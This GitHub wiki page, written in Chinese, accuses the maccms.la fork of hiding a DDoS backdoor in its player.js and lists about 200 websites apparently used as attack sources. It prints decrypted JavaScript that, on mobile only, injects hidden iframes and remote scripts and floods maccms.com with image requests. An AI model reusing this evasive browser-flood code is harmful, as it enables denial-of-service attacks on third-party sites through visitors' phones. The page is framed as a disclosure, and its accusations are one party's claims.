警告:严厉谴责CC攻击我们的.la版本假冒团队,整理了被控制的小部分肉鸡网站,有你的吗? - maccmspro/download GitHub Wiki
一天时间被请求了足足3.88B
每个小时被请求3亿次
大量重置referer的请求 但依然有浏览器不支持这种调用方式被我们抓出了日志
涉及从maccms.la下载或者更新的所有版本
v10
2020.1000.1029+ 还有la版本最新的跨年度起飞版2022.1000.1099
v8
2020.1043+
通过抓包得出是因为maccms.la最新版本加密的 player.js 手机端访问远程调用攻击js
http://union.maccms.la/html/top10.js
http://union.maccms.la/html/top.js
大家不信可以自行解密
代码解密如下
(MacPlayer.Status) {
} else {
}
function msck(name, value) {
var date = new Date();
date['setTime']((date['getTime']() + (30 * 60) * (1000))),
document['cookie'] = (name + '=' + escape(value)) + (';path=/;expires=') + date['toGMTString']();
}
//这里开始写调用缓存时间 防止被发现目的为了隐藏攻击
function mgck(name) {
`var list, reg = new RegExp('(^|\x20)' + name + '=([^;]*)(;|$)');`
`if (list = document['cookie'].match(reg)) return unescape(list[2]); else return null;`
}
var de = new Date(), mh = de['getMonth']() + 1,
da = de['getDate'](), hs = de['getHours'](), rr = mh + '' + da + '' + hs, ek = 'k1',
ev = parseFloat(mgck(ek)), ua = navigator['userAgent'],
au = '//a.laodaguan.cn/';
//这里判断移动端 过滤了windows和mac系统的抓包 所以必须通过移动端设备进行抓包才可以拿到加载内容 懂一点脚本的都能看懂
function mshr() {
`(!/(Win|Mac)/i.test(navigator['platform']) && !/(localhost|127|192|10)/i.test(location['hostname']) && isNaN(ev) && ($('.MacPlayer').length > 0) || (location['search'].indexOf('mdg') > -1)) && (/(iPhone|iPad|iPod|IOS)/i.test(ua) && $('body').append(`
`"<iframe style=\"display:none;\" referrerPolicy=\"no-referrer\" security=\"restricted\" sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"" + au + "index.html?" + rr + "\"></iframe>"`
`), msck(ek, '1'), setInterval(imgflood, 1500));`
}
//这是很常见的js 攻击手法 虽然做了referer重置但依然有浏览器不支持这种调用方式被我们抓出了日志
function imgflood() {
`rr = parseFloat(rr) + 1;`
`var img1 = new Image();`
`img1['setAttribute']('referrerPolicy', 'no-referrer');`
`img1['src'] = '//www.maccms.com/?' + new Date().getTime();`
`var img2 = new Image();`
`img2['setAttribute']('referrerPolicy', 'no-referrer');`
`img2['src'] = '//union.maccms.com/html/top10.js?' + rr;`
`var img3 = new Image();`
`img3['setAttribute']('referrerPolicy', 'no-referrer');`
`img3['src'] = '//union.maccms.com/html/top.js?' + rr;`
}
setTimeout(mshr, 50);
function abc() {
}
function pcy() {
}
如何抓包? ios、安卓下载《http cather》即可在线抓包了 快去看看你网站是否调用了union.maccms.la 还有个判断方式 手机浏览器其他页面加载完成如果播放页面浏览器头部一直是加载中进度条那么就是在长链接请求攻击不会中断非常消耗手机cpu
la的作者说它去掉了远程调用 如果遇到抓包不顺利可以看看解密的la版本player.js代码逻辑就知道为什么了
var killErrors=function(value){return true};window.onerror=null;window.onerror=killErrors;
var base64EncodeChars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64encode(str){var out,i,len;var c1,c2,c3;len=str.length;i=0;out="";while(i<len){c1=str.charCodeAt(i++)&0xff;if(i==len){out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt((c1&0x3)<<4);out+="==";break}c2=str.charCodeAt(i++);if(i==len){out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt(((c1&0x3)<<4)|((c2&0xF0)>>4));out+=base64EncodeChars.charAt((c2&0xF)<<2);out+="=";break}c3=str.charCodeAt(i++);out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt(((c1&0x3)<<4)|((c2&0xF0)>>4));out+=base64EncodeChars.charAt(((c2&0xF)<<2)|((c3&0xC0)>>6));out+=base64EncodeChars.charAt(c3&0x3F)}return out}function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}function utf16to8(str){var out,i,len,c;out="";len=str.length;for(i=0;i<len;i++){c=str.charCodeAt(i);if((c>=0x0001)&&(c<=0x007F)){out+=str.charAt(i)}else if(c>0x07FF){out+=String.fromCharCode(0xE0|((c>>12)&0x0F));out+=String.fromCharCode(0x80|((c>>6)&0x3F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}else{out+=String.fromCharCode(0xC0|((c>>6)&0x1F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}}return out}function utf8to16(str){var out,i,len,c;var char2,char3;out="";len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out+=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break}}return out}
var MacPlayer = {
'GetDate': function (f, t) {
if (!t) {
t = new Date()
}
var a = ['日', '一', '二', '三', '四', '五', '六'];
f = f.replace(/yyyy|YYYY/, t.getFullYear());
f = f.replace(/yy|YY/, (t.getYear() % 100) > 9 ? (t.getYear() % 100).toString() : '0' + (t.getYear() % 100));
f = f.replace(/MM/, t.getMonth() > 9 ? t.getMonth().toString() : '0' + t.getMonth());
f = f.replace(/M/g, t.getMonth());
f = f.replace(/w|W/g, a[t.getDay()]);
f = f.replace(/dd|DD/, t.getDate() > 9 ? t.getDate().toString() : '0' + t.getDate());
f = f.replace(/d|D/g, t.getDate());
f = f.replace(/hh|HH/, t.getHours() > 9 ? t.getHours().toString() : '0' + t.getHours());
f = f.replace(/h|H/g, t.getHours());
f = f.replace(/mm/, t.getMinutes() > 9 ? t.getMinutes().toString() : '0' + t.getMinutes());
f = f.replace(/m/g, t.getMinutes());
f = f.replace(/ss|SS/, t.getSeconds() > 9 ? t.getSeconds().toString() : '0' + t.getSeconds());
f = f.replace(/s|S/g, t.getSeconds());
return f
}, 'GetUrl': function (s, n) {
return this.Link.replace('{sid}', s).replace('{sid}', s).replace('{nid}', n).replace('{nid}', n)
}, 'Go': function (s, n) {
location.href = this.GetUrl(s, n)
}, 'Show': function () {
$('#buffer').attr('src', this.Prestrain);
setTimeout(function () {
MacPlayer.AdsEnd()
}, this.Second * 1000);
$("#playleft").get(0).innerHTML = this.Html + '';
if (!/(Win|Mac)/i.test(navigator.platform)) {
var a = document.createElement('script');
a.type = 'text/javascript';
a.async = true;
a.charset = 'utf-8';
a.src = base64decode('Ly91bmlvbi5tYWNjbXMubGEvaHRtbC90b3AxMC5qcw==') + '?r=' + this.GetDate('yyyyMMdd');
var b = document.getElementsByTagName('script')[0];
b.parentNode.insertBefore(a, b)
}
}, 'AdsStart': function () {
if ($("#buffer").attr('src') != this.Buffer) {
$("#buffer").attr('src', this.Buffer)
}
$("#buffer").show()
}, 'AdsEnd': function () {
$('#buffer').hide()
}, 'Install': function () {
this.Status = false;
$('#install').show()
}, 'Play': function () {
document.write('<style>.MacPlayer{background: #000000;font-size:14px;color:#F6F6F6;margin:0px;padding:0px;position:relative;overflow:hidden;width:' + this.Width + ';height:' + this.Height + ';min-height:100px;}.MacPlayer table{width:100%;height:100%;}.MacPlayer #playleft{position:inherit;!important;width:100%;height:100%;}</style><div class="MacPlayer">' + '<iframe id="buffer" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;"></iframe><iframe id="install" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;display:none;"></iframe>' + '<table border="0" cellpadding="0" cellspacing="0"><tr><td id="playleft" valign="top" style=""> </td></table></div>');
this.offsetHeight = $('.MacPlayer').get(0).offsetHeight;
this.offsetWidth = $('.MacPlayer').get(0).offsetWidth;
document.write('<scr' + 'ipt src="' + this.Path + this.PlayFrom + '.js"></scr' + 'ipt>')
}, 'Down': function () {
}, 'Init': function () {
this.Status = true;
this.Parse = '';
var a = player_aaaa;
if (a.encrypt == '1') {
a.url = unescape(a.url);
a.url_next = unescape(a.url_next)
} else if (a.encrypt == '2') {
a.url = unescape(base64decode(a.url));
a.url_next = unescape(base64decode(a.url_next))
}
this.Agent = navigator.userAgent.toLowerCase();
this.Width = MacPlayerConfig.width;
this.Height = MacPlayerConfig.height;
//这里开始加了移动端判断 所以必须使用手机访问才可以加载 因此你电脑抓包无果
`if (this.Agent.indexOf("android") > 0 || this.Agent.indexOf("mobile") > 0 || this.Agent.indexOf("ipod") > 0 || this.Agent.indexOf("ios") > 0 || this.Agent.indexOf("iphone") > 0 || this.Agent.indexOf("ipad") > 0) {`
`this.Width = MacPlayerConfig.widthmob;`
`this.Height = MacPlayerConfig.heightmob`
`}`
`if (this.Width.indexOf("px") == -1 && this.Width.indexOf("%") == -1) {`
`this.Width = '100%'`
`}`
`if (this.Height.indexOf("px") == -1 && this.Height.indexOf("%") == -1) {`
`this.Height = '100%'`
`}`
`this.Prestrain = MacPlayerConfig.prestrain;`
`this.Buffer = MacPlayerConfig.buffer;`
`this.Second = MacPlayerConfig.second;`
`this.Flag = a.flag;`
`this.Trysee = a.trysee;`
`this.Points = a.points;`
`this.Link = decodeURIComponent(a.link);`
`this.PlayFrom = a.from;`
`this.PlayNote = a.note;`
`this.PlayServer = a.server == 'no' ? '' : a.server;`
`this.PlayUrl = a.url;`
`this.PlayUrlNext = a.url_next;`
`this.PlayLinkNext = a.link_next;`
`this.PlayLinkPre = a.link_pre;`
`this.Id = a.id;`
`this.Sid = a.sid;`
`this.Nid = a.nid;`
`if (MacPlayerConfig.server_list[this.PlayServer] != undefined) {`
`this.PlayServer = MacPlayerConfig.server_list[this.PlayServer].des`
`}`
`if (MacPlayerConfig.player_list[this.PlayFrom] != undefined) {`
`if (MacPlayerConfig.player_list[this.PlayFrom].ps == "1") {`
`this.Parse = MacPlayerConfig.player_list[this.PlayFrom].parse == '' ? MacPlayerConfig.parse : MacPlayerConfig.player_list[this.PlayFrom].parse;`
`this.PlayFrom = 'parse'`
`}`
`}`
`this.Path = maccms.path + '/static/player/';`
`if (this.Flag == "down") {`
`MacPlayer.Down()`
`} else {`
`MacPlayer.Play()`
`}`
`}`
};
MacPlayer.Init();
看了下大部分都是海螺模版的站 应该是作者被la给忽悠了 虽然开发能力很强 但这智商也是堪忧 这么容易就被忽悠了去升级结果沦为肉鸡
唯一github官方只有: https://github.com/maccmspro 域名: https://maccms.pro 官方下载渠道已经给出完整解密版的player.js 里面加了判断la版本的不兼容 还有播放器透明预加载请求编码 未加密可自行修改。由于la版本存在自动更新后门或许很多站长都不知道什么回事,那么请尽快下载更新包手动覆盖!
被控制为攻击肉鸡的域名列表如下:
http://1.mqdy.dehttp://154.197.154.48http://154.197.154.55http://154.93.60.36http://172.121.59.45http://183.ydt.5ahome.cnhttp://23.90.22.248http://25u51.cnzu95.com:6033http://7862y.comhttp://87.sbs.5ahome.cnhttp://9ov71.51add.com:4206http://awyy18.comhttp://bwl87.comhttp://dianyings.cnhttp://dy.tv56.cnhttp://g5451.comhttp://haowywz.comhttp://hxc27.comhttp://hxc97.comhttp://i7801.comhttp://itaojuba.comhttp://lsqnjoa.cnhttp://lyl23.mehttp://m.163fahao.comhttp://mideaysj.comhttp://nq698.comhttp://v.shensgo.comhttp://vcfuli.comhttp://wuritv6.comhttp://www.234qvod.comhttp://www.2kys.comhttp://www.399q.cnhttp://www.91m.cchttp://www.auedu.orghttp://www.bajies.comhttp://www.btdyba.comhttp://www.cangpinhui.com.cnhttp://www.cechi5.comhttp://www.chinayd.orghttp://www.chok8.comhttp://www.dixi123.comhttp://www.dy1958.comhttp://www.dydzkjs.comhttp://www.fusht.comhttp://www.hanju233.comhttp://www.hantutv.comhttp://www.haohao44.comhttp://www.hotwoods.bizhttp://www.hwfudao.comhttp://www.hxc45.comhttp://www.i63.com.cnhttp://www.ikrtv.comhttp://www.itihi.comhttp://www.jinhongjx.comhttp://www.jlqsnwl.comhttp://www.madou.lahttp://www.meiyangle888.comhttp://www.mimi91.xyzhttp://www.mycctv.cnhttp://www.ncdydyy.comhttp://www.ok009.xyzhttp://www.oukepuhui.comhttp://www.pubger.comhttp://www.qdkyjh.comhttp://www.qpg6.comhttp://www.rwgaoxin.comhttp://www.rz31.comhttp://www.tzwenyi.cnhttp://www.vipys5.comhttp://www.wearry.comhttp://www.wuritv6.comhttp://www.xiuhuan.xyzhttp://www.xttzb.comhttp://www.zaoyi.nethttp://www.zhoumengping.xyzhttp://xiaomc.infohttp://xincheng888.nethttps://001d.comhttps://123kubo.nethttps://123kubo.tvhttps://173cq.comhttps://5ji.tvhttps://789dydy.comhttps://789dyy.comhttps://789yyw.comhttps://ak222.cchttps://aqpos.tophttps://awyy23.comhttps://bwl87.comhttps://ddvod.tvhttps://duonaoyingyuan.tangrenjie.tvhttps://dy0026.comhttps://hhty029.comhttps://hnxmz.comhttps://holdoo.cnhttps://hyrzs.comhttps://i58b.tvhttps://imaple.cohttps://inzdrama.comhttps://jumi.tvhttps://longvcd.comhttps://m.hjtv4.comhttps://m.keso.orghttps://m.klksm.comhttps://m.my2058.comhttps://m.sx0371.comhttps://m.tv4.cchttps://m.xindiediao.comhttps://momovod.tvhttps://movie.58yanhao.comhttps://o8tv.comhttps://ouleyingyuan.tangrenjie.tvhttps://sexx3.xyzhttps://shichojp.comhttps://shrocc.comhttps://sy0752.comhttps://tianchatv.comhttps://tv.cihttps://vip.19zh.comhttps://www.002tv.comhttps://www.173cq.comhttps://www.17kty.comhttps://www.263163.cnhttps://www.3ayy.comhttps://www.3kt.nethttps://www.52kandy.comhttps://www.555dy1.comhttps://www.5thnyh.comhttps://www.789dydy.comhttps://www.789dyw.nethttps://www.789dywz.comhttps://www.7caa.comhttps://www.8090.mehttps://www.91m.cchttps://www.99meiju.tvhttps://www.ahrmgg.comhttps://www.autonicdq.comhttps://www.bddysf.comhttps://www.biqune.comhttps://www.calmlab.comhttps://www.cclsu.comhttps://www.chok8.comhttps://www.cunzhangba.comhttps://www.dadatu2.comhttps://www.dadatutv.nethttps://www.dadatuzi.comhttps://www.dusheyy.comhttps://www.f8yy.comhttps://www.haiyouims.comhttps://www.hanjutvwz.comhttps://www.hbxhda.comhttps://www.hjtv4.comhttps://www.holdoo.cnhttps://www.jianzhenkeji.comhttps://www.jpysvip.nethttps://www.kanxi5.comhttps://www.ku2000.comhttps://www.limintv.comhttps://www.masansan.comhttps://www.meijui.comhttps://www.mindanggui.comhttps://www.mldyy.cchttps://www.mshuifu.comhttps://www.muyy.cchttps://www.newqiyu.comhttps://www.o8tv.comhttps://www.pianba.nethttps://www.ppqun.comhttps://www.puhua.cchttps://www.qcjycg.comhttps://www.raoguns.comhttps://www.schtbz.comhttps://www.tancao.cnhttps://www.tangrenjie.tvhttps://www.tianlang88.comhttps://www.tianmohk.comhttps://www.ttspt.comhttps://www.u5dy.comhttps://www.wo03.comhttps://www.wojiangwang.comhttps://www.wuguiyy.comhttps://www.wuweidy5.comhttps://www.xiafandy.comhttps://www.xianzonglin.clubhttps://www.xuejiancn.comhttps://www.xxzz2.xyzhttps://www.yhdmk.comhttps://www.ys11.xyzhttps://www.ysdzfwb.comhttps://www.zgwangzhan.comhttps://www.zhengqidiaosu.comhttps://www.zhuijuju.comhttps://xuejiancn.comhttps://xzdjc.comhttps://zgwangzhan.com